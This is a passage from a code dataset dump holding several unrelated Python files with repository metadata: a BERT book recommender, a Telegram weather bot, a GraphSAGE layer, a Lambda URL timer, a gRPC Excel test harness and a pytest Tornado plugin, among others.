origin_DATA.features.Location for j in i]) +1\nprint('all location = ', all_location)\n\n# total number of ISBNs\nall_isbn = len(set(origin_DATA.features['ISBN']))\nprint('all isbn = ', all_isbn)\n# total number of authors\nall_author = len(set(origin_DATA.features['Author']))\nprint('all author = ', all_author)\n# total number of years\nall_year = len(set(origin_DATA.features['Year']))\nprint('all year = ', all_year)\n# total number of publishers\nall_publisher = len(set(origin_DATA.features['Publisher']))\nprint('all publisher = ', 
all_publisher)\n\n\ndef get_inputs():\n # user feature inputs\n user_id = keras.layers.Input(shape=(1,), dtype='int32', name='user_id_input')\n user_location = keras.layers.Input(shape=(3,), dtype='int32', name='user_location_input')\n\n book_title_blurb_id = keras.layers.Input(shape=(max_sequence_length,), dtype='int32', name='book_title_blurb_id')\n book_title_blurb_type_id = keras.layers.Input(shape=(max_sequence_length,), dtype='int32', name='book_title_blurb_type_id')\n book_title_blurb_mask = keras.layers.Input(shape=(max_sequence_length,), dtype='int32', name='book_title_blurb_mask')\n return user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask\n\n# dimensions of the embedding matrices\nembed_dim = 8\nembed_dim_words = 16\n\ndef user_embed_layer(u_id, u_loca):\n user_id_embedd = keras.layers.Embedding(all_user, embed_dim, name='user_id_embedding')(u_id)\n user_loca_embedd = keras.layers.Embedding(all_location, embed_dim , name='user_loca_embedding')(u_loca)\n return user_id_embedd, user_loca_embedd\n\ndef get_user_feature(u_id_embedd, u_loca_embedd):\n u_id_layer = keras.layers.Dense(32, activation='relu', kernel_regularizer=tf.nn.l2_loss, name='u_id_dense')(u_id_embedd)\n# u_id_layer_drop = keras.layers.Dropout(rate=0.5, name='u_id_layer_drop')(u_id_layer)\n # u_id_layer.shape = (?, 1, 64)\n # u_loca_layer.shape = (?, 64)\n # another Dense layer could be added here\n u_loca_layer = keras.layers.LSTM(16, go_backwards=True, name='u_loca_lstm')(u_loca_embedd)\n u_loca_layer_lstm = keras.layers.Dense(32, activation='relu', kernel_regularizer=tf.nn.l2_loss, name='u_loca_layer_lstm')(u_loca_layer)\n u_id_reshape = keras.layers.Reshape([32])(u_id_layer)\n u_combine = keras.layers.concatenate([u_id_reshape, u_loca_layer_lstm],axis=1, name='u_combine')\n print(u_combine.shape)\n # could an activation function be used here?\n u_feature_layer = keras.layers.Dense(100, activation='tanh', name='u_feature_layer')(u_combine)\n print(u_feature_layer.shape)\n return u_feature_layer\n\n\ndef get_book_feature(book_title_id, book_title_type_id, book_title_mask):\n config = BertConfig()\n # also return the hidden states\n config.output_hidden_states = True\n bert_model = TFBertModel.from_pretrained(bert_path + 'bert-base-uncased-tf_model.h5', config=config)\n book_title_cls = bert_model(book_title_id, attention_mask=book_title_mask, token_type_ids=book_title_type_id)\n print(len(book_title_cls))\n print(book_title_cls[0].shape)\n print(book_title_cls[1].shape)\n book_feature_layer = keras.layers.Dense(100, activation='tanh')(book_title_cls[1])\n return book_feature_layer\n\n\ndef get_rating(user_feature, book_feature):\n# multiply_layer = keras.layers.Lambda(lambda layer: tf.reduce_sum(layer[0]+layer[1], axis=1, keepdims=True), name = 'user_book_feature')((user_feature, book_feature))\n inference_layer = keras.layers.concatenate([user_feature, book_feature], axis=1, name='user_book_feature')\n inference_dense = tf.keras.layers.Dense(64, kernel_regularizer=tf.nn.l2_loss, activation='relu')(inference_layer)\n multiply_layer = tf.keras.layers.Dense(1, name=\"inference\")(inference_layer) # inference_dense\n return multiply_layer\n\ndef creat_model():\n user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask = get_inputs()\n user_id_embedd, user_loca_embedd = user_embed_layer(user_id, user_location)\n u_feature_layer = get_user_feature(user_id_embedd, user_loca_embedd)\n book_feature_layer = get_book_feature(book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask)\n multiply_layer = get_rating(u_feature_layer, book_feature_layer)\n model 
= keras.Model(inputs=[user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask],\n outputs=[multiply_layer])\n return model\n\nmodel = creat_model()\nprint(model.summary())\n\ndef get_train_val_test():\n m = len(origin_DATA.features['Location'])\n m = math.ceil(m/10)\n # keep the first 3 location entries\n loca = np.zeros((m, 3))\n for i in range(m):\n loca[i] = np.array(origin_DATA.features['Location'][i])\n\n print(loca[:-2])\n # the order here must match the model's inputs: ids, then type_ids, then masks\n input_features = [origin_DATA.features['User-ID'].to_numpy(), loca,\n data_blurb_title.input_ids, data_blurb_title.input_type_ids, data_blurb_title.input_masks]\n labels = origin_DATA.labels.to_numpy()\n # shuffle and split the dataset\n np.random.seed(100)\n number_features = len(input_features)\n shuffle_index = np.random.permutation(m)\n shuffle_train_index = shuffle_index[:math.ceil(m*0.96)]\n shuffle_val_index = shuffle_index[math.ceil(m*0.96): math.ceil(m*0.98)]\n shuffle_test_index = shuffle_index[math.ceil(m*0.98):]\n train_features = [input_features[i][shuffle_train_index] for i in range(number_features)]\n train_labels = labels[shuffle_train_index]\n val_features = [input_features[i][shuffle_val_index] for i in range(number_features)]\n val_labels = labels[shuffle_val_index]\n test_features = [input_features[i][shuffle_test_index] for i in range(number_features)]\n test_labels = labels[shuffle_test_index]\n return train_features, train_labels, val_features, val_labels, test_features, test_labels\n\ntrain_features, train_labels, val_features, val_labels, test_features, test_labels = get_train_val_test()\nprint(train_features[0].shape)\nprint(val_features[0].shape)\nprint(test_features[0].shape)\n\nclass model_network():\n def __init__(self):\n self.batchsize = 2\n self.epoch = 3\n def creat_model(self):\n user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask = get_inputs()\n user_id_embedd, user_loca_embedd = user_embed_layer(user_id, user_location)\n u_feature_layer = get_user_feature(user_id_embedd, user_loca_embedd)\n b_feature_layer = get_book_feature(book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask)\n multiply_layer = get_rating(u_feature_layer, b_feature_layer)\n model = keras.Model(inputs=[user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask] ,\n outputs=[multiply_layer])\n return model\n def train_model(self):\n model_optimizer = keras.optimizers.Adam()\n model = self.creat_model()\n model.compile(optimizer=model_optimizer, loss=keras.losses.mse)\n history = model.fit(train_features, train_labels, validation_data=(val_features, val_labels), epochs=self.epoch, batch_size=self.batchsize, verbose=1)\n return model, history\n def predict_model(self, model):\n test_loss = model.evaluate(test_features, test_labels, batch_size=self.batchsize, verbose=1)\n return test_loss\n\nnet_work = model_network()\nmodel, history = net_work.train_model()","repo_name":"StrayCamel247/Recommend_system","sub_path":"model_3_bert.py","file_name":"model_3_bert.py","file_ext":"py","file_size_in_byte":16852,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"6118487899","text":"from aiogram import Bot, Dispatcher, types, executor\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom middlewares import SchedulerMiddleware\nfrom tasks import set_scheduled_jobs\n\nfrom configs import i18n, TOKEN\nfrom db import collusers, insert_new_user, 
get_current_user_col, update_notify_hours_by_user_id, \\\n update_city_hours_by_user_id, user_counts\nfrom utils import get_current_user_weather_data, get_text, SCHEDULED_HOURS, cities, get_key_from_dict_value\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot, storage=MemoryStorage())\n\n# Setup i18n middleware\ndp.middleware.setup(i18n)\n_ = i18n.lazy_gettext\n\n# Setup schedulers\nscheduler = AsyncIOScheduler()\ndp.middleware.setup(SchedulerMiddleware(scheduler))\n\nmain_menu_kbs = types.ReplyKeyboardMarkup(\n [\n [\n types.KeyboardButton(_(\"📅 Bugungi ob-havo\"))\n ],\n [\n types.KeyboardButton(_(\"⚙️ Sozlamalar\"))\n ]\n ],\n resize_keyboard=True\n)\n\nsettings_kbs = types.ReplyKeyboardMarkup(\n [\n [\n types.KeyboardButton(_(\"📍 Shaharni o'zgartirish\"))\n ],\n [\n types.KeyboardButton(_(\"⏰ Obuna o'zgartirish\"))\n ],\n [\n types.KeyboardButton(_(\"⬅️ Ortga qaytish\"))\n ]\n ],\n resize_keyboard=True\n)\n\nschedule_kbs_list = types.ReplyKeyboardMarkup(\n [\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[:3]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[3:6]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[6:9]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[9:12]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[12:15]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[15:18]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[18:21]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[21:24]],\n [types.KeyboardButton(_(\"⬅️ Ortga qaytish\"))]\n ]\n)\n\ncity_adding_emoji = \"🌆 \"\n\ncity_list_kb = types.ReplyKeyboardMarkup(\n [\n [types.KeyboardButton(city_adding_emoji + cities[i]['name'])] for i in cities.keys()\n ]\n)\n\n\n@dp.message_handler(commands='start')\nasync def start(message: types.Message):\n count = await collusers.count_documents({'_id': message.from_user.id})\n if count == 0:\n await insert_new_user(message.from_user.id)\n await message.answer(_(\"Bot ishlab turipti\"),\n reply_markup=main_menu_kbs)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"📅 Bugungi ob-havo\"))\nasync def language_echo(msg: types.Message):\n user_data = await get_current_user_col(msg.from_user.id)\n if user_data is not None:\n weather_data = await get_current_user_weather_data(user_data)\n w_hourly = weather_data[\"w_hourly_data\"]\n w_day = weather_data[\"w_day\"]\n data_to_send = get_text(w_day, w_hourly, user_data)\n await msg.answer(data_to_send)\n else:\n await insert_new_user(msg.from_user.id)\n await language_echo(msg)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"⚙️ Sozlamalar\"))\nasync def settings_echo(msg: types.Message):\n user_data = await get_current_user_col(msg.from_user.id)\n if user_data is not None:\n text_dict = user_data\n text_dict.update({\"city_name\": cities.get(text_dict['city'])['name']})\n await msg.answer(\n _(\"Hozirgi sozlamalaringiz\\n\"\n \"Shahar: {city_name}\\n\"\n \"Obuna: Har kuni {notify_hours}:00 da\").format(**text_dict),\n reply_markup=settings_kbs\n )\n else:\n await insert_new_user(msg.from_user.id)\n await settings_echo(msg)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"⏰ Obuna o'zgartirish\"))\nasync def notification_echo(msg: types.Message):\n await msg.answer(_(\"Qachon ob-havo ma'lumotini olishni istaysiz?\"), reply_markup=schedule_kbs_list)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"⬅️ Ortga qaytish\"))\nasync def back_button(msg: types.Message):\n await start(msg)\n\n\n@dp.message_handler(lambda msg: 
msg.text.startswith(city_adding_emoji))\nasync def city_setting_button(msg: types.Message):\n city_name = msg.text.split(city_adding_emoji)[1]\n city_key = get_key_from_dict_value(city_name)\n await update_city_hours_by_user_id(msg.from_user.id, city_key)\n await msg.answer(_(\"{city_name} shahri tanlandi\").format(city_name=city_name), reply_markup=main_menu_kbs)\n\n\n@dp.message_handler(lambda msg: msg.text == \"/users_count\")\nasync def get_users_count(msg: types.Message):\n await msg.answer(\"Users count: {}\".format(await user_counts()))\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"📍 Shaharni o'zgartirish\"))\nasync def city_change_button(msg: types.Message):\n await msg.answer(_(\"Iltimos, shahringizni tanlang.\"), reply_markup=city_list_kb)\n\n\n@dp.message_handler(regexp=\"^([0-1]?[0-9]|2[0-3]):[0-5][0-9]$\")\nasync def hours_setting_button(msg: types.Message):\n hour = int(msg.text.split(\":\")[0])\n await update_notify_hours_by_user_id(msg.from_user.id, hour)\n await msg.answer(_(\"Endi men sizga har kuni soat {hour}:00 da ob-havo ma'lumotini jo'nataman.\").format(hour=hour),\n reply_markup=main_menu_kbs)\n\n\n@dp.message_handler()\nasync def echo(msg: types.Message):\n await msg.answer(msg.text)\n\n\nasync def on_startup(dp):\n scheduler.start()\n set_scheduled_jobs(scheduler, bot)\n print(await dp.bot.get_me())\n\n\nif __name__ == \"__main__\":\n print(\"Bot ishga tushirilmoqda...\")\n executor.start_polling(dp, on_startup=on_startup)\n","repo_name":"STQT/pogodasuzbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5097353227","text":"from typing import List\n\n\nclass Solution:\n def minCost(self, colors: str, neededTime: List[int]) -> int:\n def extra_time(costs: List[int]) -> int:\n # helper suggested by the original TODO comments: within a run of\n # same-colored balloons, keep the most expensive one and pop the rest\n return sum(costs) - max(costs) if len(costs) > 1 else 0\n\n cur_col = \"\"\n costs = []\n time = 0\n\n for i, color in enumerate(colors):\n if color == cur_col:\n costs.append(neededTime[i])\n else:\n time += extra_time(costs)\n cur_col = color\n costs = [neededTime[i]]\n time += extra_time(costs)\n\n return time","repo_name":"zathrath03/leetcode","sub_path":"1578-minimum-time-to-make-rope-colorful/1578-minimum-time-to-make-rope-colorful.py","file_name":"1578-minimum-time-to-make-rope-colorful.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"48828580844","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.utils import to_dense_adj\nimport threading\n\n\nclass GraphSAGEConvolution(nn.Module):\n def __init__(self, in_features, out_features, aggregator='mean'):\n super(GraphSAGEConvolution, self).__init__()\n assert aggregator in ['mean', 'pool'], \"Aggregator must be one of ['mean', 'pool']\"\n\n self.aggregator = aggregator\n if aggregator == 'mean':\n self.linear = nn.Linear(in_features, out_features)\n\n if self.aggregator == 'pool':\n self.linear = nn.Linear(in_features * 2, out_features)\n self.pool_linear = nn.Linear(in_features, in_features)\n\n self.adj = None\n self.neighbors = None\n\n def forward(self, x, edge_index):\n if self.adj is None and self.neighbors is None:\n if self.aggregator == 'mean':\n self._make_adj(edge_index)\n if self.aggregator == 'pool':\n self._make_neighbors(edge_index)\n # Aggregate neighbors\n if self.aggregator == 'mean':\n 
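# mean aggregation: average the neighbour features via the symmetrically normalized adjacency (D^-1/2 A D^-1/2)\n 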
x_neighbors = torch.matmul(self.adj_normalized, x)\n x_concat = x_neighbors\n\n elif self.aggregator == 'pool':\n pool_x = F.relu(self.pool_linear(x))\n\n # # Define a worker function for computing the maximum values for each node\n # def worker(node_idx):\n # rows = self.neighbors[node_idx]\n # max_vals, _ = torch.max(pool_x[rows], dim=0)\n # x_neighbors[node_idx] = max_vals\n #\n # # Initialize a tensor to store the maximum values\n # x_neighbors = torch.zeros(x.shape).to(edge_index.device)\n #\n # # Create a list of threads\n # threads = [threading.Thread(target=worker, args=(i,)) for i in range(self.adj.shape[0])]\n #\n # # Start the threads\n # for thread in threads:\n # thread.start()\n #\n # # Wait for the threads to finish\n # for thread in threads:\n # thread.join()\n\n x_neighbors = torch.zeros(x.shape).to(edge_index.device)\n for i in range(self.adj.shape[0]):\n rows = self.neighbors[i]\n max_vals, _ = torch.max(pool_x[rows], dim=0)\n x_neighbors[i] = max_vals\n\n # Concatenate the node features and the aggregated neighbor features\n x_concat = torch.cat([x, x_neighbors], dim=1)\n\n # Apply the linear transformation\n out = self.linear(x_concat)\n\n return out\n\n def _make_adj(self, edge_index):\n if self.aggregator == 'mean':\n adj = to_dense_adj(edge_index).squeeze(0)\n # keep the dense adjacency so forward() can tell the cache is filled\n self.adj = adj\n D = torch.diag(torch.sum(adj, dim=0) ** (-0.5))\n self.adj_normalized = torch.matmul(torch.matmul(D, adj), D)\n\n def _make_neighbors(self, edge_index):\n # the 'pool' aggregator never calls _make_adj, so build the dense adjacency\n # here as well; it supplies the node count used in forward()\n self.adj = to_dense_adj(edge_index).squeeze(0)\n self.neighbors = {}\n for i in range(self.adj.shape[0]):\n self.neighbors[i] = edge_index[1][edge_index[0] == i]\n\n\nclass GraphSAGE(nn.Module):\n def __init__(self, input_dim, hidden_dim, output_dim, num_layers, aggregator='mean'):\n super(GraphSAGE, self).__init__()\n self.layers = nn.ModuleList()\n self.layers.append(GraphSAGEConvolution(input_dim, hidden_dim, aggregator))\n\n for _ in range(num_layers - 2):\n self.layers.append(GraphSAGEConvolution(hidden_dim, hidden_dim, aggregator))\n\n self.layers.append(GraphSAGEConvolution(hidden_dim, output_dim, aggregator))\n\n def forward(self, x, edge_index):\n for i, layer in enumerate(self.layers):\n x = layer(x, edge_index)\n # Apply activation and dropout for all layers except the last one\n if i < len(self.layers) - 1:\n x = F.relu(x)\n x = F.dropout(x, p=0.5, training=self.training)\n return x\n","repo_name":"dipplestix/gnn_coloring","sub_path":"algorithms/graphsage.py","file_name":"graphsage.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12900297931","text":"from hscommon.testutil import eq_\n\nfrom ..base import TestApp, with_app\nfrom ...gui.print_view import PrintView\n\nclass TestDateRangeOnApril2009:\n def do_setup(self, monkeypatch):\n monkeypatch.patch_today(2009, 4, 1)\n app = TestApp()\n app.drsel.select_month_range()\n app.show_tview()\n app.pv = PrintView(app.tview)\n return app\n \n @with_app(do_setup)\n def test_attributes(self, app):\n # We don't bother testing other views, but they're expected to have PRINT_TITLE_FORMAT\n eq_(app.pv.title, 'Transactions from 01/04/2009 to 30/04/2009')\n \n","repo_name":"Mouchnino/moneyguru","sub_path":"core/tests/gui/print_view_test.py","file_name":"print_view_test.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70310909392","text":"import json\nimport requests \nimport time\n\ndef lambda_handler(event, context):\n # Disable SSL Verify = false Warnings\n 
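# (requests would otherwise emit urllib3's InsecureRequestWarning for every call made with verify=False below)\n 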
requests.packages.urllib3.disable_warnings()\n urls = event\n lambdaReturn = {\n \"responses\": []\n }\n for url in urls:\n start = time.time()\n r = requests.get(url, verify=False)\n end = time.time()\n response = {\n \"statusCode\":str(r.status_code),\n \"requestTime\":str(end-start)[0:5],\n \"url\":url\n }\n lambdaReturn[\"responses\"].append(response)\n return {\n 'statusCode': 200,\n 'body': lambdaReturn\n }\n\n","repo_name":"fheutz/100dayChallenge-Python","sub_path":"code/003_lambda_http/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6601638717","text":"# -*- coding: UTF-8 -*-\n\nimport json\nimport logging\nimport re\nimport sys\n\nfrom grpc._channel import _Rendezvous\n\nfrom common.module import env_module\nfrom common.module import excel_module\nfrom model.data_pool import DataPool\n\nsys.path.append(\"..\")\nsys.path.append(\"../../\")\nimport grpc\n\n# from deepdiff import DeepDiff\n# from pprint import pprint\n\nclass GetExcelCaseData:\n \"\"\"\n Initialise and fetch the Excel case data\n 1. read the row for the given id\n 2. get the url\n 3. get the request method\n 4. get the request parameters and re-encode them\n 5. get the expected result\n 6. convert the expected result into a dict\n 7. set the headers\n 8. get the response\n 9. get the response as a dict\n :param file_name: name of the test-data file\n :param sheet_index: index of the sheet\n :param id: caseId\n :return:\n \"\"\"\n\n def __init__(self):\n self.protoFileName = ''\n self.serviceName = ''\n self.methodName = ''\n self.requestClass = ''\n self.exp_resp = '{}'\n self.data_res = '{}'\n\n def get_case_data(self, file_name, sheet_index=0, row_id=0, module_proto='order', module_host='order', dataPool=DataPool, data=None,\n **kwargs):\n\n \"\"\"\n 1. read the row for the given id\n 5. get the expected result\n 8. get the response\n :param file_name: name of the test-data file\n :param sheet_index: index of the sheet\n :param id: caseId\n :return:exp_resp_dic,act_resp_dic\n \"\"\"\n excel_handle = excel_module.Read_Excel(file_name)\n sheet = excel_handle.get_sheet_by_index(sheet_index)\n case_data_list = excel_handle.get_row_values(sheet, row_id)\n\n self.protoFileName = case_data_list[1]\n self.serviceName = case_data_list[2]\n self.methodName = case_data_list[3]\n self.requestClass = case_data_list[4]\n\n if case_data_list[5] is not None:\n self.data_res = case_data_list[5]\n if case_data_list[6] is not None:\n self.exp_resp = case_data_list[6]\n\n matches = re.findall('\\$\\{(.*?)\\}', self.data_res)\n mset = set(matches)\n for item in mset:\n itemVal = str(dataPool.get(item)).encode('UTF-8')\n self.data_res = self.data_res.replace(\"${%s}\" % item, itemVal)\n if itemVal == '':\n print ('variable {} has not been given a value'.format(item))\n\n self.data = json.loads(self.data_res, encoding=\"utf-8\")\n logging.info(self.data_res)\n if kwargs:\n for i in kwargs:\n for j in self.data:\n if i == j:\n self.data[j] = kwargs[i]\n if data is not None:\n self.data = data\n\n self.data = self.__rewriteData(self.data)\n\n exp_resp = self.get_case_data_exp()\n act_resp = self.get_case_data_act(module_proto, module_host)\n\n # print (\"exp_resp\\n\", json.dumps(exp_resp))\n # print(\"act_resp\\n\", act_resp)\n return exp_resp, act_resp\n\n def __rewriteData(self, data):\n\n if isinstance(data, int) or isinstance(data, float) or isinstance(data, long):\n return data\n\n if isinstance(data, unicode):\n return data.encode('utf-8')\n\n if (isinstance(data, list)):\n _list = []\n for item in data:\n _list.append(self.__rewriteData(item))\n\n return _list\n\n if (isinstance(data, tuple)):\n _tuple = []\n for item in data:\n 
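# recursively rewrite each element so values nested inside the tuple are utf-8 encoded as well\n 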
_tuple.append(self.__rewriteData(item))\n\n return tuple(_tuple)\n\n if (isinstance(data, dict)):\n _data = {}\n for key in data:\n if isinstance(key, unicode):\n _key = key.encode('utf-8')\n else:\n _key = key\n\n _data[_key] = self.__rewriteData(data[key])\n\n return _data\n\n return data\n\n def get_case_input(self, file_name, sheet_index=0, row_id=0):\n \"\"\"\n Fetch the raw input data\n 1. get the actual result\n 2. get the real result\n :return:exp_resp_dic,act_resp_dic\n \"\"\"\n excel_handle = excel_module.Read_Excel(file_name)\n sheet = excel_handle.get_sheet_by_index(sheet_index)\n case_data_list = excel_handle.get_row_values(sheet, row_id)\n self.data = case_data_list[6]\n return self.data\n\n def get_case_data_exp(self):\n \"\"\"\n Fetch the expected result\n 1. read the expected result directly\n 2. convert the expected result into a dict\n :return: the expected result\n \"\"\"\n logging.debug(\"-----------------1.expect-------------------------\" + self.exp_resp)\n # return self.exp_resp.encode(\"utf-8\")\n return json.loads(self.exp_resp)\n\n def get_case_data_act(self, module_proto, module_host='order'):\n \"\"\"\n Fetch the actual result\n 1. set the headers\n 2. get the response\n 3. get the response as a dict\n :param module_host:\n :return: the actual result\n \"\"\"\n target = env_module.Env_Module().get_grpc_target(module_host)\n print ('target:', target)\n print (self.serviceName + \".\" + self.methodName)\n print ('input:', json.dumps(self.data))\n channel = grpc.insecure_channel(target)\n\n pb2 = \"test_case.pb2.\" + module_proto + \".\" + self.protoFileName + \"_pb2\"\n pb2_grpc = \"test_case.pb2.\" + module_proto + \".\" + self.protoFileName + \"_pb2_grpc\"\n stubName = self.serviceName + \"Stub\"\n methodName = self.methodName\n requestClass = self.requestClass\n\n # import test_case.protos.pb2.saasOrderService_pb2\n # import test_case.protos.pb2.saasOrderService_pb2_grpc.SaasOrderServiceStub\n # import test_case.pb2.pos.posmsgservice_pb2\n # import test_case.pb2.pos.posmsgservice_pb2\n # import test_case.pb2.pos.posmsgservice_pb2_grpc;\n pb2_mod = __import__(pb2, fromlist=True)\n pb2_grpc_mod = __import__(pb2_grpc, fromlist=True)\n\n stub = getattr(pb2_grpc_mod, stubName)(channel)\n\n request = getattr(pb2_mod, requestClass)(**self.data)\n response = None\n try:\n if(hasattr(stub, methodName)):\n response = getattr(stub, methodName)(request)\n except (\n _Rendezvous\n ) as e:\n print (e)\n print ('grpc exception!!!')\n\n error_code = e._state.code.name\n error_msg = e._state.details\n\n if error_code == 'UNAVAILABLE':\n # the service is unavailable, so mark the current cloud endpoint as unavailable\n print ('grpc error: UNAVAILABLE')\n raise e\n elif error_code == 'UNAUTHENTICATED':\n # authentication failed, so mark the current HPosInfo as expired\n print ('grpc error: UNAUTHENTICATED')\n raise e\n elif error_code == 'DEADLINE_EXCEEDED':\n # five deadline timeouts in a row mean the link is considered unusable\n print ('grpc error: DEADLINE_EXCEEDED')\n raise e\n else:\n print ('grpc error: other errors')\n raise e\n\n # if (hasattr(stub, methodName)):\n # response = getattr(stub, methodName)(request)\n return response\n\n def firstCharToLower(self, str):\n return str[0].lower() + str[1:]\n\n def get_case_data1(self, *case_data_list):\n\n \"\"\"\n 1. read the row for the given id\n 5. get the expected result\n 8. get the response\n :param file_name: name of the test-data file\n :param sheet_index: index of the sheet\n :param id: caseId\n :return:exp_resp_dic,act_resp_dic\n \"\"\"\n\n self.protoFileName = case_data_list[1]\n self.serviceName = case_data_list[2]\n self.methodName = case_data_list[3]\n self.requestClass = case_data_list[4]\n module_proto = case_data_list[0]\n module_host = case_data_list[0]\n\n if case_data_list[5] is not None:\n self.data = case_data_list[5]\n self.data = self.__rewriteData(self.data)\n 
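# log the payload that will actually be sent, with its fields already rewritten to utf-8\n 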
logging.info(self.data)\n act_resp = self.get_case_data_act(module_proto, module_host)\n\n return act_resp\n","repo_name":"jiaheqi/python-api-test","sub_path":"common/service/excel_case_facade_rpc.py","file_name":"excel_case_facade_rpc.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13254455423","text":"from contextlib import closing, contextmanager\nimport inspect\nfrom inspect import iscoroutinefunction\n\nimport tornado.ioloop\nimport tornado.testing\nimport tornado.simple_httpclient\n\nimport pytest\n\n\ndef get_test_timeout(pyfuncitem):\n timeout = pyfuncitem.config.option.async_test_timeout\n marker = pyfuncitem.get_closest_marker(\"timeout\")\n if marker:\n timeout = marker.kwargs.get(\"seconds\", timeout)\n return timeout\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--async-test-timeout\",\n type=float,\n help=(\"timeout in seconds before failing the test \" \"(default is no timeout)\"),\n )\n parser.addoption(\n \"--app-fixture\",\n default=\"app\",\n help=(\"fixture name returning a tornado application \" '(default is \"app\")'),\n )\n\n\n@pytest.mark.tryfirst\ndef pytest_pycollect_makeitem(collector, name, obj):\n if collector.funcnamefilter(name) and iscoroutinefunction(obj):\n return list(collector._genfunctions(name, obj))\n\n\n@pytest.mark.tryfirst\ndef pytest_pyfunc_call(pyfuncitem):\n funcargs = pyfuncitem.funcargs\n testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames}\n\n if not iscoroutinefunction(pyfuncitem.obj):\n pyfuncitem.obj(**testargs)\n return True\n\n try:\n loop = funcargs[\"io_loop\"]\n except KeyError:\n loop = tornado.ioloop.IOLoop.current()\n\n loop.run_sync(\n lambda: pyfuncitem.obj(**testargs), timeout=get_test_timeout(pyfuncitem)\n )\n return True\n\n\n@pytest.fixture\ndef io_loop():\n \"\"\"\n Create new io loop for each test, and tear it down after.\n \"\"\"\n loop = tornado.ioloop.IOLoop()\n loop.make_current()\n yield loop\n loop.clear_current()\n loop.close(all_fds=True)\n\n\n@pytest.fixture\ndef http_server_port():\n \"\"\"\n Port used by `http_server`.\n \"\"\"\n return tornado.testing.bind_unused_port()\n\n\n@pytest.yield_fixture\ndef http_server(request, io_loop, http_server_port):\n \"\"\"Start a tornado HTTP server that listens on all available interfaces.\n\n You must create an `app` fixture, which returns\n the `tornado.web.Application` to be tested.\n\n Raises:\n FixtureLookupError: tornado application fixture not found\n \"\"\"\n http_app = request.getfixturevalue(request.config.option.app_fixture)\n server = tornado.httpserver.HTTPServer(http_app)\n server.add_socket(http_server_port[0])\n\n yield server\n\n server.stop()\n\n if hasattr(server, \"close_all_connections\"):\n io_loop.run_sync(\n server.close_all_connections,\n timeout=request.config.option.async_test_timeout,\n )\n\n\nclass AsyncHTTPServerClient(tornado.simple_httpclient.SimpleAsyncHTTPClient):\n def initialize(self, *, http_server=None):\n super().initialize()\n self._http_server = http_server\n\n def fetch(self, path, **kwargs):\n \"\"\"\n Fetch `path` from test server, passing `kwargs` to the `fetch`\n of the underlying `tornado.simple_httpclient.SimpleAsyncHTTPClient`.\n \"\"\"\n return super().fetch(self.get_url(path), **kwargs)\n\n def get_protocol(self):\n return \"http\"\n\n def get_http_port(self):\n for sock in self._http_server._sockets.values():\n return sock.getsockname()[1]\n\n def get_url(self, path):\n return 
\"%s://127.0.0.1:%s%s\" % (self.get_protocol(), self.get_http_port(), path)\n\n\n@pytest.fixture\ndef http_server_client(http_server):\n \"\"\"\n Create an asynchronous HTTP client that can fetch from `http_server`.\n \"\"\"\n with closing(AsyncHTTPServerClient(http_server=http_server)) as client:\n yield client\n\n\n@pytest.fixture\ndef http_client(http_server):\n \"\"\"\n Create an asynchronous HTTP client that can fetch from anywhere.\n \"\"\"\n with closing(tornado.httpclient.AsyncHTTPClient()) as client:\n yield client\n","repo_name":"eukaryote/pytest-tornasync","sub_path":"src/pytest_tornasync/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"83"} +{"seq_id":"39425177509","text":"def menu():\n print('Hello! Welcome to my program about working on list in Python\\nWhat you wanna do?')\n print('1- Show the list items')\n print('2- Add an element (to the end) of the list')\n print('3- Insert an element at a position in the list')\n print('4- Delete the last element of the list')\n print('5- Reverse the list')\n print('6- Clear the list')\n print('7- Quit')\n\nmyList = []\ndef insertElement(theList : list, theIndex : int, theElement):\n theList.insert(theIndex,theElement)\n\nwhile True:\n menu()\n choice = 